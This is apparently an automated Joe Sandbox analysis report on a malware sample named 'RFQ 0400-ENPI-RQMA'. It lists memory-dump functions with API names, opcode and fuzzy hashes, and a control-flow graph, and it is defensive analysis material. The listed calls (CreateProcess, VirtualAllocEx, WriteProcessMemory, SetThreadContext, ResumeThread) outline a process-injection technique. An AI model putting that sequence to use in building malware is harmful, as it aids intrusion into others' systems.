                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: 40ae14a18bf8df82f6229659700d8c9005754d4accf9b2d8fe114228364ac22b
                                                                                      • Instruction ID: 689160bab5f84f34dd2b3bd3aeb9620cd99dec710055475ecbaa76550ed4bce9
                                                                                      • Opcode Fuzzy Hash: 40ae14a18bf8df82f6229659700d8c9005754d4accf9b2d8fe114228364ac22b
                                                                                      • Instruction Fuzzy Hash: AE916BB1D0021ADFDB60DFA8C840BDDFBB2BF44314F1481AAE859A7250DB759985CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AADB0 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 784 16aadb0-16aadcf 785 16aadfb-16aadff 784->785 786 16aadd1-16aadde call 16a9d10 784->786 787 16aae13-16aae54 785->787 788 16aae01-16aae0b 785->788 793 16aade0 786->793 794 16aadf4 786->794 795 16aae61-16aae6f 787->795 796 16aae56-16aae5e 787->796 788->787 840 16aade6 call 16ab448 793->840 841 16aade6 call 16ab458 793->841 794->785 798 16aae93-16aae95 795->798 799 16aae71-16aae76 795->799 796->795 797 16aadec-16aadee 797->794 800 16aaf30-16aaff0 797->800 801 16aae98-16aae9f 798->801 802 16aae78-16aae7f call 16a9d1c 799->802 803 16aae81 799->803 835 16aaff8-16ab023 GetModuleHandleW 800->835 836 16aaff2-16aaff5 800->836 805 16aaeac-16aaeb3 801->805 806 16aaea1-16aaea9 801->806 804 16aae83-16aae91 802->804 803->804 804->801 808 16aaec0-16aaec9 call 16a9d2c 805->808 809 16aaeb5-16aaebd 805->809 806->805 815 16aaecb-16aaed3 808->815 816 16aaed6-16aaedb 808->816 809->808 815->816 817 16aaef9-16aaf06 816->817 818 16aaedd-16aaee4 816->818 824 16aaf08-16aaf26 817->824 825 16aaf29-16aaf2f 817->825 818->817 820 16aaee6-16aaef6 call 16a9d3c call 16a9d4c 818->820 820->817 824->825 837 16ab02c-16ab040 835->837 838 16ab025-16ab02b 835->838 836->835 838->837 840->797 841->797
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 016AB016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 29d9eb109d3dadc255bb760b1960a84d1657a63eec3bffe8730bd1bdf773d556
                                                                                      • Instruction ID: a47a80e1df0a97fdc1674a2d340df8f31b728e48e2b78517fa54dcca5bb4892d
                                                                                      • Opcode Fuzzy Hash: 29d9eb109d3dadc255bb760b1960a84d1657a63eec3bffe8730bd1bdf773d556
                                                                                      • Instruction Fuzzy Hash: 24812270A00B458FDB25DF69D84476ABBF2BF88300F10892ED58697B50DB75E849CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016A590D Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 016A59C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 16a3cf3f5da4b23767ba5684b716ba5a211d581c0336484765c880660fb71c10
                                                                                      • Instruction ID: 1ae8357d938a5d08620de5aac9104b1896f72211c6fb9f27a66ec21a01094502
                                                                                      • Opcode Fuzzy Hash: 16a3cf3f5da4b23767ba5684b716ba5a211d581c0336484765c880660fb71c10
                                                                                      • Instruction Fuzzy Hash: F241E1B0C00719CEDB24CFAAC884B8DBBF5BF49314F64809AD419AB255DB756985CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016A44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 016A59C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 26c830998e79a5ca184070c81a3ecb38d452fb1a023734e232fa6c51c62552aa
                                                                                      • Instruction ID: 5ff79a90bf69438762758542b6904a312f731b2aaf3917bd112c5699d252c60a
                                                                                      • Opcode Fuzzy Hash: 26c830998e79a5ca184070c81a3ecb38d452fb1a023734e232fa6c51c62552aa
                                                                                      • Instruction Fuzzy Hash: 6941EFB0D0071DCEDB24CFAAC884A8EBBF5BF49314F64806AD419AB251DB756985CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85B61 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D85BF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: bd983cdf5b6826a864be54c378197bf20dfef911098d4ecef4bbbf4e7311fa5e
                                                                                      • Instruction ID: dd3c1eb6c6dd225f3c8cb3ba75d97f47b57f888adae98b5067339bd4be0bac2e
                                                                                      • Opcode Fuzzy Hash: bd983cdf5b6826a864be54c378197bf20dfef911098d4ecef4bbbf4e7311fa5e
                                                                                      • Instruction Fuzzy Hash: 8E2135B59002599FCB10DFA9C981BEEBBF1FF48310F10842AE959A7350C7789955CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85B68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07D85BF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: e81893f7f32d6027467b255cb74845f6ee02ad34e6c8f88c0b95ba384b3aa0ee
                                                                                      • Instruction ID: 8f86ce7af69872422b63e72be2e2c60d793a2e0187916e5786a0041f768f119e
                                                                                      • Opcode Fuzzy Hash: e81893f7f32d6027467b255cb74845f6ee02ad34e6c8f88c0b95ba384b3aa0ee
                                                                                      • Instruction Fuzzy Hash: 2F2155B59003599FCB10DFAAC980BDEBBF5FF48310F10842AE919A7250C778A954CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85C50 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D85CD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: f7697277533f660b355ee0c396ced30df840df2bd147976ea87732c2dc81fddd
                                                                                      • Instruction ID: 9df1b2492e7113550522a8de37425ca9d6a7a6fb7f226811f61428bb430c7d8d
                                                                                      • Opcode Fuzzy Hash: f7697277533f660b355ee0c396ced30df840df2bd147976ea87732c2dc81fddd
                                                                                      • Instruction Fuzzy Hash: AF2105B18002599FCB10DFAAD981AEEFBF1FF48320F10842AE559A7251C7399555CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AD398 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016AD427
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: a075c9c91b140c494141bb10f2f114363380d08377f9e7a0d1a5136799e878d6
                                                                                      • Instruction ID: 735528ba3a412fd627bcf472f0a89b841bd46723e6d39c57a887e1e7859bd759
                                                                                      • Opcode Fuzzy Hash: a075c9c91b140c494141bb10f2f114363380d08377f9e7a0d1a5136799e878d6
                                                                                      • Instruction Fuzzy Hash: C42100B59013489FDB11CFAAD984ADEBFF5EF08320F14845AE958A7311D338A944CF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85C58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07D85CD8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 6b988c5726fe54d445f3b5f56eb0aa29a9ba5fb6005d8c4d8a4c225ae8d6e40b
                                                                                      • Instruction ID: b5db0b0ef3761f1fb444ce661eb899a4a2588ceaa4e23524beff37a43b6ade5d
                                                                                      • Opcode Fuzzy Hash: 6b988c5726fe54d445f3b5f56eb0aa29a9ba5fb6005d8c4d8a4c225ae8d6e40b
                                                                                      • Instruction Fuzzy Hash: FB2139B18003599FCB10DFAAC940ADEFBF5FF48310F508429E559A7250C7359554CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D859D0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D85A4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: 795593070ed6630f97beb943d865bb08313234bc1e3d35cff0916f3f40ebcc97
                                                                                      • Instruction ID: b9e0b2f7724bd962843014927df1cb802af8dfca97ed7f1acc0367ea1eb7a7a6
                                                                                      • Opcode Fuzzy Hash: 795593070ed6630f97beb943d865bb08313234bc1e3d35cff0916f3f40ebcc97
                                                                                      • Instruction Fuzzy Hash: 3D2149B19003098FDB10DFAAC585BEEFBF4EF48324F148429D55AA7240CB78A944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AD3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016AD427
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: cee85eacfad460dbc58a4415a8f041a764a057a28b7a89d289d6b2d091d9545e
                                                                                      • Instruction ID: e0e99ca34bab0304cd1eafc1849215ef7321d0dcdffe3a22b94d73ac1c979c5d
                                                                                      • Opcode Fuzzy Hash: cee85eacfad460dbc58a4415a8f041a764a057a28b7a89d289d6b2d091d9545e
                                                                                      • Instruction Fuzzy Hash: 3821E2B59002089FDB10CFAAD984ADEFFF8EB48320F14801AE918A3310D375A940CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85AA1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D85B16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 66bbff11d2e0f8dbf9b49b8ea41775a075b30155e2d5d92057d153b076c65d14
                                                                                      • Instruction ID: ae86f31d30a2c46a9e69489ba95ef2f9c73c134dd16151c286ea4bc9a6862b8b
                                                                                      • Opcode Fuzzy Hash: 66bbff11d2e0f8dbf9b49b8ea41775a075b30155e2d5d92057d153b076c65d14
                                                                                      • Instruction Fuzzy Hash: CF1147B69002499FCB20DFA9D844BDEFFF5EF88320F208419E559A7250C775A550CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AB048 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016AB491,00000800,00000000,00000000), ref: 016AB682
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 6eb0dae03de45ebd915ea37f66756923c08ec07bdd0cc5cc2724c540d2fa8f46
                                                                                      • Instruction ID: 8f22ef0285eaa2d2fe02bf8433e1a27a65dc934556f674c2871a4f749146be60
                                                                                      • Opcode Fuzzy Hash: 6eb0dae03de45ebd915ea37f66756923c08ec07bdd0cc5cc2724c540d2fa8f46
                                                                                      • Instruction Fuzzy Hash: 231123B69003188FDB14CF9AD844ADEFBF4EB48310F54842AE519A7310C375A945CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AB610 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016AB491,00000800,00000000,00000000), ref: 016AB682
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: e843366aaecae3b2949c0ee40285ab8ee8565cc4abe3dc82891657942cb90bbf
                                                                                      • Instruction ID: b1d4eec1219af67d06367c9e0e4386db53cb6d01100474104a41ab4989cc9f03
                                                                                      • Opcode Fuzzy Hash: e843366aaecae3b2949c0ee40285ab8ee8565cc4abe3dc82891657942cb90bbf
                                                                                      • Instruction Fuzzy Hash: 551123B68003589FDB14CFAAC848ADEFFF4EB48310F54846AD559A7310C375A945CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85AA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D85B16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: bd539d292309402a9fff78741336fcea69c6a0e932084382c71997693975d870
                                                                                      • Instruction ID: a57365ba30b330854bc011ee37a2dff1d76d537861276372a0094ba5a5e9a260
                                                                                      • Opcode Fuzzy Hash: bd539d292309402a9fff78741336fcea69c6a0e932084382c71997693975d870
                                                                                      • Instruction Fuzzy Hash: AC1137B59002499FCB10DFAAC844BDEFFF5EF88320F108419E559A7250C775A954CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85920 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 07D85982
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 3bd81358bf70a72f1e0af9b5165df70c14733af9f9041e6277cd667a474b9329
                                                                                      • Instruction ID: 04f23273a3e1feeab6f94f638b9a15b524124780cac5066e412438c45b408dd3
                                                                                      • Opcode Fuzzy Hash: 3bd81358bf70a72f1e0af9b5165df70c14733af9f9041e6277cd667a474b9329
                                                                                      • Instruction Fuzzy Hash: FE113AB59003498FCB10DFAAC4457EEFBF4EF88324F208419D559A7250CB75A544CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AAFB0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 016AB016
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 6f44c80d83af92672700b6c9821f17b05ca0e887469fbffd8225b28eaebad985
                                                                                      • Instruction ID: 37102832212e8711a146d801feba8739c17bb0c1182f457979ffe32dfaafe972
                                                                                      • Opcode Fuzzy Hash: 6f44c80d83af92672700b6c9821f17b05ca0e887469fbffd8225b28eaebad985
                                                                                      • Instruction Fuzzy Hash: 05110FB5C003498FDB24CF9AC844ADEFBF4AF88324F10842AD529A7210C375A545CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D843D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D8801D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: 71c11d559d82a21d01871a1cf20ec60f0754d131af6fba8e05c029309e08bf6c
                                                                                      • Instruction ID: 3971014310f970fcb563fb8803ad10f83c89ce0f97f8b76ea983321a2c9f2dff
                                                                                      • Opcode Fuzzy Hash: 71c11d559d82a21d01871a1cf20ec60f0754d131af6fba8e05c029309e08bf6c
                                                                                      • Instruction Fuzzy Hash: 9211F2B5800349DFDB20DF9AD885BDEFBF8EB48320F10841AE559A7210C375A984CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D87FB9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D8801D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost
                                                                                      • String ID:
                                                                                      • API String ID: 410705778-0
                                                                                      • Opcode ID: f3af0acdbceabbe79fdde4cc11407bcca10580d0d6afb7fc4b1ddac3fbf3f205
                                                                                      • Instruction ID: bc4f9444cbf8790c913eb6922070a017fbc4e7cd1077dc758df42d7c37729ae7
                                                                                      • Opcode Fuzzy Hash: f3af0acdbceabbe79fdde4cc11407bcca10580d0d6afb7fc4b1ddac3fbf3f205
                                                                                      • Instruction Fuzzy Hash: F011F2B58002499FDB20DF9AD985BDEFBF4FB58320F108419D559B7210C375A984CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27714 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: 3ab8b756810e92d306896402a9aa976c3e3b4256eac98793e2a25a9d7934d3d9
                                                                                      • Instruction ID: 0ca0db8d732090f1cb472413716753a03e8e45fd8b3b0d1d24a161ee6da9cac8
                                                                                      • Opcode Fuzzy Hash: 3ab8b756810e92d306896402a9aa976c3e3b4256eac98793e2a25a9d7934d3d9
                                                                                      • Instruction Fuzzy Hash: A351A271B012168FDB15EF79C84847EBBF6EFC4220B148569E419DB3A1EF30AD068790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27290 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: O};5
                                                                                      • API String ID: 0-3558557551
                                                                                      • Opcode ID: 13d36b43da2ec0b6886fde83e3f3686ae6ac45ad6f1f358337046fa591494917
                                                                                      • Instruction ID: 8c3964529306d25dbe76ba60912c25d9b31f2b72d225f5f6278632ebaabeb835
                                                                                      • Opcode Fuzzy Hash: 13d36b43da2ec0b6886fde83e3f3686ae6ac45ad6f1f358337046fa591494917
                                                                                      • Instruction Fuzzy Hash: F6417FB0A15219EFDB44CF95D6858AEFBF2FB8A300FA0D895E409A7324D730DA51DB14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B29598 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q
                                                                                      • API String ID: 0-671973202
                                                                                      • Opcode ID: cbf6d969e1428864b56079b189c53fb9ae53d621de105b40f07d1f6f42c90008
                                                                                      • Instruction ID: 3449a6feb89b4e19feb2aa52d054a4a746cf3d5f8b68fdbba97d13df815aa099
                                                                                      • Opcode Fuzzy Hash: cbf6d969e1428864b56079b189c53fb9ae53d621de105b40f07d1f6f42c90008
                                                                                      • Instruction Fuzzy Hash: 2D115EB1F0021A8BDB15EFB999006EEB7F6AB94211F50007AC509E7340EF359E06DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21807 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 86b37e2ab749d32520d6bc8b8e7d8c60709a85ebf2ec088c0b8e7bddd5a9794d
                                                                                      • Instruction ID: 073d5df127fdd56c28838581f6c4ef9a5c9899b6bdcb6b4fdaef521f5ccfe592
                                                                                      • Opcode Fuzzy Hash: 86b37e2ab749d32520d6bc8b8e7d8c60709a85ebf2ec088c0b8e7bddd5a9794d
                                                                                      • Instruction Fuzzy Hash: 4E5127F4A1612DCBE7108F6CC8802BDB7B2FB85314F1482A6E569CB294C738D943DB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B21650 Relevance: .1, Instructions: 110COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e50d426bb81c9b26699a64e8359726e643418ddfb1b6083b6cfe3e4c815ed970
                                                                                      • Instruction ID: 65df8152f74e22762a12a234356c365d2c976179cd1c3369f64f884507dcb4ab
